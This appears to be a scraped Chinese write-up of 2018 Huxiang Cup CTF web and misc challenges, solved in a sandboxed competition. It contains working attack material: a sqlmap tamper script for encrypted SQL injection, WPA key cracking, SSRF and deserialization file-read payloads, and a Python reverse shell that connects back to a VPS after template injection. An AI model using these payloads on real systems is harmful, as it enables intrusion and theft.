2018湖湘杯web、misc记录

1.题目名 Code Check

打开题目,右键发现有id参数的url,简单base64解码以后发现不是明文,说明利用了其他的加密方式,那么应该会有具体的加密方式给我们,于是试试常见的文件泄露,可以发现list.zip,打开发现是具体的解密逻辑与查询逻辑。

有了解密逻辑我们就可以逆着写出加密逻辑,另外id参数明显存在注入,只需要写一个加密的sqlmap的tamper脚本,然后放到sqlmap的tamper目录下就可以了,之后在sqlmap里跑一跑就可以出flag

下面是改过的tamper脚本

#!/usr/bin/env python

"""

Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)

See the file ‘LICENSE‘ for copying permission

"""

import base64

from Crypto.Cipher import AES

from lib.core.enums import PRIORITY

from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.LOWEST

def dependencies():

    pass

def encrypt(text):

    padding = ‘\0‘

    key = ‘ydhaqPQnexoaDuW3‘

    iv = ‘2018201920202021‘

    pad_it = lambda s: s+(16 - len(s)%16)*padding

    cipher = AES.new(key, AES.MODE_CBC, iv)

    text = text + ‘hxb2018‘

    return base64.b64encode(base64.b64encode(cipher.encrypt(pad_it(text))))

def tamper(payload, **kwargs):

         return encrypt(payload)

2.题目名 Flow

题目是个流量包,802.11的,数据包是加密的,所以尝试一下能不能爆破出来key来解密一下上层的其他数据包来找flag,一般做无线的题目需要用到aircrack-ng这个无线破解工具。

首先需要一个弱密码的字典,然后运行 aircrack-ng -w 字典名 + 流量包,运气比较好刚好爆破出来了key为password1

有了key就能导入到wireshark里面对wpa加密的无线数据包进行解密

解密之后在导出http对象中发现flag

3.题目名 readflag

ssrf的题目,首先读了下/etc/passwd没有什么有用的东西,所以继续读一下/etc/hosts发现内网里面有两台主机

经过简单测试,发现题目的内网主机号为230,另一台内网机器的主机号是183,所以尝试读一下另一个机器上的文件,首先读一下apache的配置文件,发现如下路径树

又因为http的网站在站点的配置文件下有默认的000-default.conf,所以尝试访问如下:

发现了web的源码路径,直接读取

发现路径/var/www/html/ssrf/readflag,尝试访问是个elf,一堆乱码,所以用wget下载这个elf,然后ida里面加载一下发现如下:

所以更改一下路径,读取如下,得到flag

4.题目名 mynote

这是一道反序列化的题目,在我们注册登陆以后,在抓包中发现picture参数有问题,base64解码发现其为序列化的数据,所以猜测是否其存在反序列化漏洞,我们上传一个jpg文件

又因为后端会访问我们上传的图片并会返回到前端,所以尝试是否可以读取任意文件,上传1.jpg以后,抓包并且改为payload为a:1:{i:0;s:14:”../../flag.php”;},然后放包如下图所示,可以看到一串base64编码

解密后就能看到flag如上图所示

5. 管理员的flag在哪里?

注册登陆后,在添加标题那里刚开始选择“是”这个选项,以为是xss,但是没效果,于是选择“否”,添加标题后发现有show页面,尝试了一下模板注入的payload

返回了9说明的确存在模板注入,于是尝试是否可以执行命令

构造payload如下:

返回的值证明可以执行命令,又继续尝试了一下curl和wget 都能使用,所以尝试反弹一下shell试试,在vps上监听一下端口,使用exp下载vps上的shell.py文件并执行,构造以下payload:

shell如下:

#!/usr/bin/env python

#coding:utf-8

import os

import pty

import socket

lhost = "xx.xx.xx.xx" #vps的ip地址

lport = 21192 #vps的端口

def main():

    s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    s.connect((lhost,lport))

    os.dup2(s.fileno(),0)

    os.dup2(s.fileno(),1)

    os.dup2(s.fileno(),2)

    pty.spawn(‘/bin/bash‘)

    s.close()

main()

分别show以上的两条payload以后就能够拿到shell,在Xme0目录下存在auto.js 查看它如下图所示得到flag

6.disk

下载一个是一个vmdk文件,首先看看能不能提取出来啥东西,这里需要用到7z

提取出来里面有四个flag文件,但是打开并不是flag,队友说可能跟NTFS隐藏数据流有关系,所以百度一波,在网上找到如下工具

能够检测出隐藏在文件中的NTFS数据流,搜索一下果然找到了可疑的数据流

百度到ads原来是可以隐藏后门的,于是分别打开四个flag文件

打开flag1.txt后是一段二进制,在线将其转化为字符串试试

发现是flag,所以继续转换后面的三个文件中的二进制文件并转换就可以得到flag

7.Hidden Write

首先拿到图片先binwalk一下,发现什么都没有

然后strings一下图片

结尾发现flag的一部分字符串78cd89c18c

肯定在别的地方还有flag的其他部分,所以用16进制编辑器看看图片,发现其有三个图片其中两张图片没有头部的前8个字节,所以把两张图片抠出来加上头部,就变成3张图片了

此时掏出stegsolve来给三张图片用一用,在第二张图中发现了bgr通道的lsb隐写

hxb2018{1e30f3b836d78d25c ,由此得到了flag的另一个部分,此时明显还少最后一个部分,此时有三张图片当然想到用盲水印,以前在比赛中遇到过,所以用下图所示的工具试试:

由于有3张图片所以需要两两结合来花费3次来尝试

由此得到flag的最后一段为20b4a}

最后拼接得到flag:

hxb2018{1e30f3b836d78d25c78cd89c18c20b4a}

原文地址:https://www.cnblogs.com/wfzWebSecuity/p/9986587.html

时间: 2024-10-24 00:50:49

2018湖湘杯web、misc记录的相关文章

Bugku Writeup —文件上传2(湖湘杯)

我们先来看下题目,题目说明是文件上传 我们可以尝试通过构造payload来进行测试 php://filter/read=convert.base64-encode/resource=flag 获取到flag,之后进行解码,得到真正的flag 总结: 题目考察的是文件包含漏洞. 如果不懂payload意思的小伙伴可以自行百度一下 原文地址:https://www.cnblogs.com/X1a0/p/9906510.html

Web学习记录<一>目标与任务

3D打印机的项目终于小小的告一个段落了.在3D打印这个领域里,绝大多部分都是机械的从业人员,年龄普遍在30岁以上.在这一年的编程生涯里面,充当了半个程序员的角色,从最开始的读LinuxCNC源码,到后来的开发3D打印机桌面切片软件,在这个行业里的人看来,都是些边外活.山寨太厉害了,传统行业里的竞争就是这么残酷,今天你家出机器了,三天时间,人家就能抄出来.只有里面的软件是抄不来的.于是,国内大部分机器用的都是国外两年前就已将停止维护的开源软件. 这个行业的路还很远,我会一直关注下去,适当的时候,将

ISCC2014--basic+web+misc

之前也没做过这一部分的题,但觉得这些题挺有意思的,比赛时间又长,就边学边做,也学到不少东西. Basic 兵者诡道 进入关卡后 一番胡乱猜测后就没着了,大牛提示用GET,但是web小白没玩过抓包啊,学习一番,用WinsockExpert 得到了Key:Welcome-to-ISCC 知己知彼 只有两种字符,首先就猜测是摩尔密码,翻译为7个字符"mwggerw",提交不对,试试移位密码,得到"isccans",OK! 正则指令 又是完全不会的东西,不过上课无聊,就百度

解决Apache的错误日志巨大的问题以及关闭Apache web日志记录

调整错误日志的级别 这几天 apache错误日志巨大 莫名其妙的30G  而且 很多都是那种页面不存在的  网站太多了  死链接相应的也很多于是把错误警告调低了 因为写日志会给系统带来很大的损耗.关闭日志以后,甚至最高可以提高整体性能近40%(粗略估计)那么如何关闭日志呢? 可以通过降低log级别的办法来减少日志读写. 这里要提醒的是,这么做将给"入侵检测"以及其他基于日志分析的工作带来麻烦.所以请谨慎使用.网上相关文章很多,但说的都不详细,擦边而过,下面详细说一下具体操作步骤. 编辑

ASP.NET Web API 记录请求响应数据到日志的一个方法

原文:http://blog.bossma.cn/dotnet/asp-net-web-api-log-request-response/ ASP.NET Web API 记录请求响应数据到日志的一个方法 REST风格的服务架构已经成为越来越多人的选择,之前我用过WCF来实现REST服务,WCF是一个很强大的框架,干这点小事有点太沉重的感觉.后来微软又推出了一个ASP.NET Web API,专门用来处理一些基本的Http服务,即灵活又简单,推荐大家都看看. 今天这篇文章是使用ASP.NET W

[V&N2020 公开赛] Web misc部分题解

0x00 前言 写了一天题目,学到了好多东西, 简单记录一下 0x01 Web HappyCTFd 直接使用网上公开的cve打: 解题思路:先注册一个admin空格账号,注意这里的靶机无法访问外网,邮箱填上buu内网的邮箱以admin账户登陆.然后修改密码,给我们注册的邮箱发送邮件,去内网邮箱处登陆,点击链接修改密码.这样平台真正的admin账户就被修改了. 我们以用户名admin,密码为我们刚刚修改的登陆.找到flag. CHECKIN perl 脚本反弹shell: 链接: https://

切面保存web访问记录

package com.hn.xf.device.api.rest.aspect; import com.hn.xf.device.api.rest.authorization.manager.TokenManager; import com.hn.xf.device.api.rest.authorization.model.TokenModel; import com.hn.xf.device.api.rest.config.Constants; import com.hn.xf.device

实验吧web解题记录

自以为sql注入掌握的还是比较系统的,然而,做了这些题之后才发现,大千世界无奇不有,真是各种猥琐的思路...还是要多学习学习姿势跟上节奏呀 登录一下好吗?? http://ctf5.shiyanbar.com/web/wonderkun/web/index.html 试了一下发现他过滤了/ or union select - # 虽然and ' " = + %没有被过滤,但用%0b和%23都没效,于是还在想这是用了多麻烦的WAF,越想越复杂我竟然还去用xss,真是跑题了... 然而最后的payl

nginx反向代理后端web服务器记录客户端ip地址

nginx在做反向代理的时候,后端的nginx web服务器log中记录的地址都是反向代理服务器的地址,无法查看客户端访问的真实ip. 在反向代理服务器的nginx.conf配置文件中进行配置. location /bbs { proxy_pass http://192.168.214.131/bbs; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarde